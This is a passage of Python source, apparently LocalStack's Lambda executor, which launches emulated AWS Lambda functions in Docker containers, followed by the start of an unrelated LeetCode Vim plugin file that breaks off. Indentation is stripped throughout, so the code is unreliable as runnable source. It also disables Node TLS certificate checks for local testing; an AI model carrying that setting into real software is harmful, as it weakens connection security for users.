LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details) or ''
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
runtime = func_details.runtime or ''
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if func_details and is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
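            # rewrite e.g. 'docker run ...' into 'echo $AWS_LAMBDA_EVENT_BODY | docker run ...',
            # letting the shell pipe the payload into the container instead of this process writing to stdin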
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
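        # e.g. a raw result of 'log line 1\nlog line 2\n{"statusCode": 200}' is split here so that
        # only the trailing '{"statusCode": 200}' is kept as the return value (illustrative payload)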
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_details, env_vars, command):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
        # inject dummy test credentials into the Lambda environment
        environment['AWS_ACCESS_KEY_ID'] = 'test'
        environment['AWS_SECRET_ACCESS_KEY'] = 'test'
# custom command to execute in the container
command = ''
events_file = ''
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_details, environment, command)
# run Lambda executor and fetch invocation result
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
        # clean up the temporary events file (it was saved under the Lambda working directory)
        if events_file:
            events_file_path = os.path.join(lambda_cwd, events_file)
            os.path.exists(events_file_path) and rm_rf(events_file_path)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_details, env_vars, command):
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
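            # e.g. with a port offset of 5000 and 500 unique ports (illustrative values),
            # successive invocations cycle _LAMBDA_SERVER_PORT through 5000..5499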
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(func_details, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
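        # resulting shape (illustrative): [docker cp "<lambda_cwd>/." "<container>:/var/task";]
        #   docker exec -e KEY="$KEY" ... <container> <entry_point> <handler>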
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = '%s rm %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Runs the idle container check once and re-schedules itself every 60 seconds,
        destroying any containers that have been idle for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_details, env_vars, command):
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
elif handler:
command = '"%s"' % handler
else:
command = ''
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
            env_vars['DOCKER_LAMBDA_API_PORT'] = str(port)
            env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = str(port)
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cp_cmd = '%s cp "%s/." "$CONTAINER_ID:/var/task";' % (docker_cmd, lambda_cwd) if lambda_cwd else ''
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
env_vars_string, network_str, dns_str, rm_flag,
docker_image, command,
cp_cmd,
docker_cmd)
else:
mount_flag = ''
if lambda_cwd:
mount_flag = '-v "%s":/var/task' % Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s'
' %s' # code mount
' %s'
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, mount_flag, env_vars_string,
network_str, dns_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
path_before = sys.path
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path = [lambda_cwd] + sys.path
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
sys.path = path_before
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
        LOG.debug(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
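        # translate a path inside the container's temp folder to the corresponding path on the
        # Docker host, e.g. '<TMP_FOLDER>/lambda.abc' -> '<HOST_TMP_FOLDER>/lambda.abc' (placeholder names)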
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
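        # e.g. 'C:\Users\me\lambda' -> '<WINDOWS_DOCKER_MOUNT_PREFIX>/C/Users/me/lambda'
        # (prefix name is a placeholder for the configured mount prefix)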
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ''
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
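        # e.g. runtime 'python3.6' with the 'lambci/lambda' registry yields '"lambci/lambda:20191117-python3.6"',
        # while a runtime not in the list above, e.g. 'nodejs12.x', stays '"lambci/lambda:nodejs12.x"'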
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
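        # e.g. for archive '/tmp/app/my-lambda.jar' with '/tmp/app/lib/util.jar' present, this yields
        # '.:lib/util.jar:my-lambda.jar:*.jar:java/lib/*.jar' (illustrative paths)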
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
leetcode.py
|
import json
import logging
import re
import time
import os
import pickle
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
try:
import browser_cookie3
except ImportError:
browser_cookie3 = None
try:
import keyring
except ImportError:
keyring = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
LC_PROGRESS_ALL = LC_BASE + '/api/progress/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-Requested-With': 'XMLHttpRequest',
'X-CSRFToken': session.cookies.get('csrftoken', '')}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
